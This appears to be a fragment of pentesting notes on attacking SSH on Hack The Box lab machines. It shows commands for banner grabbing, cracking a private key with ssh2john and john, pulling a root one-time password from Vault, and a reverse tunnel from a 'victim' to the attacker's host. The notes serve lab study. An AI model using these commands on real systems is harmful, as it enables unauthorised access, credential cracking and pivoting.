22 - SSH
Last updated
Was this helpful?
Last updated
Was this helpful?
Was this helpful?
Vault is used to provice one-time passwords (OTP) for SSH logins. To request a OTP you need to know the role example ssh/creds/otp_key_role, the role is found in secrets.sh.
$ nc -vn <IP> 22$ ssh-keygen -t rsa -b 4096 -f matt-id_rsa$ ssh root@beep.htb
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
$ ssh -oKexAlgorithms=+diffie-hellman-group-exchange-sha1 root@beep.htb// Convert id_rsa (.pem) to hash with ssh2john, and crack with john.
$ ssh2john.py id_rsa > id_rsa.hash
$ john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt$ vault write ssh/creds/root_otp ip=10.10.10.110
Key Value
--- -----
lease_id ssh/creds/root_otp/bdbe45d6-24b0-6a02-8534-d37bbb3f54c5
lease_duration 768h
lease_renewable false
ip 10.10.10.110
key 1762e6a1-f975-61f8-814e-f7d65a2a1f51
key_type otp
port 22
username rootssh_config
sshd_config
authorized_keys
ssh_known_hosts
known_hosts
id_rsa// Remote tunnel from victim, enum victim port 5432 (postgresql)
ssh -N -f -R 5432:localhost:5432 p3@10.10.14.10
// Local tunnel